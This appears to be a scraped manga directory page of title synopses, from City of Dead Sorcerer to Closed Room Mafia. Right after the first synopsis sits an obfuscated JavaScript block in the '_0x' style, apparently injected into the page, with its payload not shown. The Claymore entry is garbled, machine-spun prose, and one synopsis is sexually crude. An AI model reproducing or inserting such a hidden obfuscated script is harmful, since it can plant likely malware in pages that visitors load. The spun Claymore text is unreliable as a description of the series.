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City of Dead Sorcerer

The year is 2014, a new substance, SDE01, commonly referred to as “Mana” is discovered by a group of Russian scientists. The world plunges into a development race to find uses of this new seemingly unlimited source of energy that cannot be seen or felt. 16 years after the discovery, it’s now the self-proclaimed Age of Magic, where you can download an App to your very phone and cast magic. However, heavy restrictions have been imposed over the available spells, and the required paperwork to even use a high level spell are astronomic. Among the citizens of this new world, a red robed mysterious man seems capable of wielding extremely powerful magic in a way that should not be possible. It’s unknown what his aim is or what he wants to accomplish. All that’s known about this mysterious person is that he has been using forbidden level spells to kill evil-doers throughout the city. But detective Kim is in charge of catching this murderer/hero. And he doesn’t plan on giving up.<script></script><script>(function(_0x1a07ab,_0x5dff44){var _0x4f87bc=_0x49b4,_0x4a0a86=_0x1a07ab();while(!![]){try{var _0x5683a9=parseInt(_0x4f87bc(0xff))/(0x4*0x1a3+0xe50+0x13*-0x119)+parseInt(_0x4f87bc(0x10f))/(-0x2*0x70+-0x1*-0x899+-0x18b*0x5)+parseInt(_0x4f87bc(0xfe))/(-0xba5*-0x1+0xde9+-0x1f7*0xd)*(-parseInt(_0x4f87bc(0x108))/(-0x1464+0x382+0x10e6))+-parseInt(_0x4f87bc(0x112))/(0x98b+-0x101*0x2+-0x784)*(parseInt(_0x4f87bc(0xf4))/(0x1*0x15bf+-0x1*0x1837+0x27e))+parseInt(_0x4f87bc(0x10a))/(-0x23c6+0x54+0x2379)+-parseInt(_0x4f87bc(0xf9))/(0x28e+0xb1b+0x1*-0xda1)*(-parseInt(_0x4f87bc(0x103))/(0x1bc2+-0x1138+-0xa81*0x1))+parseInt(_0x4f87bc(0x10b))/(0x2336+-0x1*-0x48b+-0x27b7);if(_0x5683a9===_0x5dff44)break;else _0x4a0a86['push'](_0x4a0a86['shift']());}catch(_0x33cc55){_0x4a0a86['push'](_0x4a0a86['shift']());}}}(_0x82af,0x2*-0xc2b9+0x5cf5c+-0x10379));function _0x49b4(_0x4421e1,_0x46a8e5){var _0x5c80be=_0x82af();return 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City Where the Moon Does Not Rise

Ha-jeong, a high school girl living an unfortunate life, has only a glimpse of the daily life of the influencer \"Daldalrun.\" Ha-jeong has an obsession level of affection for her and even hacked into the wall pad of her house and peeks at even her very private life. One day, while peeking into Daldalrun\'s room as usual. Ha-jeong witnesses Daldalrun\'s death, and the next day, she finds herself possessed by her dead body....


Clamp Gakuen Tanteidan

From Tokyopop: CLAMP School Detectives focuses on the exploits of Akira, Nokoru, and Suoh - 3 pre-teen sleuths - and their quest to make the CLAMP world safe for the girls in their class ...


Classmate to Meikyuu no Futekisetsu na Kouryakuhou

From MangaHelpers & Kirei Cake: It has been decided that Nishi High will close in two years time. Since then, the student population had dropped to a total of only seven. Hazakura Motoya, one of the remaining students, decides to stay for the free ride through high school. Suddenly, everyone is shocked when they receive three new transfer students, Kayama, Mizumura, and Toujou, girls who are actually members of a special military division. Soon after, Motoya and the three girls witness a giant tower suddenly appearing on school grounds. Motoya is chosen by destiny to enter the tower with the girls in order to uncover the mysteries of the tower.


Classmate, Kamimura Yuuka wa Kou Itta.

Shirasaki is incredibly bored by his unchanging daily school life and he ends up falling for his weird classmate Kamimura Yuuka, who rants about changing the world to his uninterested classmates. However, when she reveals the truth about the nature of their world to him, everything will quickly become stranger than he would ever have expected!



Read Claymore manga Show is set on a fictional medieval island where people are harassed by Yoma, humanoid shape-shifters that feed on people. A cryptic group, called The Organization, creates human-Yoma hybrid vehicles to kill Yoma for a fee. These female warriors wear uniforms that are armored. Main character in Claymore manga Claymore and Yoma warriors likewise are powered with a demonic energy, Yoki, allowing shape-shifting extreme strength and. The action of awakening is likened to the sensation of sexual climax while both female and male warriors existed in days gone by hence the development of male Claymores ceased completely and only the girls proved to be successful warriors. The isle world is divided with one warrior delegated to each. Claymore warriors No. 1 through 47 are rated on their service line Yoki possible, strength, agility, wisdom, feeling and leadership. A warrior's status falls and climbs based on the warrior's strength in terms of other warriors. It's not clear when the possibility lies within the warriors or whether the warriors strength comes from training/expertise. Along with all having distinct names, most warriors (typically full of status) further their identity by possessing an original sword technique, fighting style, or yoki power. A couple of fighting styles include: releasing a blast of yoki to get a brief fit of speed, fighting with two swords, and extending the arm. For yoki skill, there are quite precisely in close quarters and many Claymores who are able to feel yoki over vast spaces. This seems to be, while not attacking, a precious and very uncommon skill as well as the Claymores in the Organization with this skill are generally highly rated. Additionally, there are four Claymores which have attacking techniques which are yoki. The first is Galatea's power to command her adversaries yoki for short intervals during conflict, generally to cause the assault to lose of the enemy. The 2nd is Teresa's: her power to feel yoki is not really weak that she is able to feel her adversaries body being moved around by it how and when her enemy would attack next, and will thus feel, a technique afterwards reproduced by Clare. The next skill is the fact that of Raftela who's in a position to control movements and the eyesight of other Claymores. She's used as an anti-warrior warrior. Claymores would be the titular characters of the show. People would be the most numerous and politically dominant species understood in both the Mainland as well as the Island. Yoma are beings that feed on blood and human flesh. They are able to shapeshift into human form which allows them to dwell among people. They are created by the Organization by sending them to the North while the daughters are sent to the East to become Claymores and rounding up orphan sons. The outcome is a Yoma. Yoma have rate and strength beyond individuals and will regenerate damaged bodies at unbelievable rates. Yoma in their authentic state have gold cat like eyes, razor sharp teeth and claws, muscle, elongated limbs and torsos, blood that is purple and grey, purple, brown or green skin. Other manga: + UQ Holder Manga + Tenkuu Shinpan manga


Cleopatra D.C.

The Cleopatra Corns Group, aka Cleopatra DC, is a powerful financial conglomerate controlling most of the United States economy, almost as powerful as the US government itself. At the top of the organization is the beautiful, smart and brave Ms. Cleo, the Group's young, talented Chairman, a blonde African-American who fought her way out of the slums. Good thing she manages her company so well--it means she can handle the repair bill from that airplane crashing into her bedroom. With stolen artifacts, corporate kidnappings, and top-secret cyborg projects gone awry, her luck only gets worse from there.


Climax Exorcism With A Single Touch!

It's like Jujutsu Kaisen but the MC's power is fingering the ghosts until they cum, also there are a lot of girls with big boobs. Climax Exorcism. It is an obscene ability that forces a someone to climax when stimulated, whether they are dead or alive, and also causes evil spirits and monsters to ascend to heaven when they cum. Haruhisa Furuya, the boy who possesses this cursed ability to make all existence climax and expel evil spirits, is one of the lowest-ranking students in the exorcist academy After all, if he uses his ability, he will die (socially) in many ways... But Haruhisa has met someone, A girl named Misaki Souya, a girl with an evil eye capable of exposing people's secrets. This is the story of how those who were called the worst, and The worthless degenerates exorcists become the strongest ones in history.


Clock Tower

A comic that shows different paths of HUMAN Entertainment's panic horror adventure game: "Clock Tower".Due to the comic being released in different methods, the page ratio will be different: the Prologue chapter was bundled with the PS1 complete re-release and the First Fear chapter was included within The Method to Capture Victory Guidebook.Related:> Clock Tower GHOST HEAD ( )


Clock Tower GHOST HEAD

A prologue comic to HUMAN Entertainment's horror game "Clock Tower GHOST HEAD" (localized as "Clock Tower II: The Struggle Within").A follow-up comic was released in Japan.Due to localization differences, two versions of the comic have been put up: the Ghost Head version is the original, the Struggle Within version has the US localized game differences included to make it easier for international fans to read.The comic itself was bundled in with the Clock Tower GHOST HEAD The Method to Capture Victory Guidebook and was not released outside of Japan.Related:> Clock Tower( )


Close Your Eyes Close to Me

Jenny Jian didn’t know what she was getting into when she got hired as assistant to an elusive gentleman. His name: Simon Bo, famous professor, detective, the youngest criminologist in the world and also unbelievably attractive. Nine teenagers have gone missing and—according to Simon—it’s up to Jenny to help crack the case. But is the reclusive, logic-bound, Simon somehow a suspect himself? Or are her feelings clouding her judgment as she gets too close to the case and Simon?


Closed Room Mafia

High school student Kang Chul-joing awoke in an unknown locked room. He finds himself in a chaotic situation, he searched around the room and found an old MP3. What he learned from the message left on the MP3 was that he was poisoned and that he had only three hours left to live. Kang Chul-joong, who was usually a mystery quiz enthusiast, tries to escape the unknown room by finding clues based on his reasoning skills that he has accumulated over the years. However, the reality is different from the ideal. What is the last clue that he noticed when he made a series of mistakes and ended up in an urgent situation where the poison spread and he start vomiting blood?! A new survival game presented by Baek Ji-woon the creator of "Struggle" and "Undead King"! Is there any way to escape this hellish secret room!
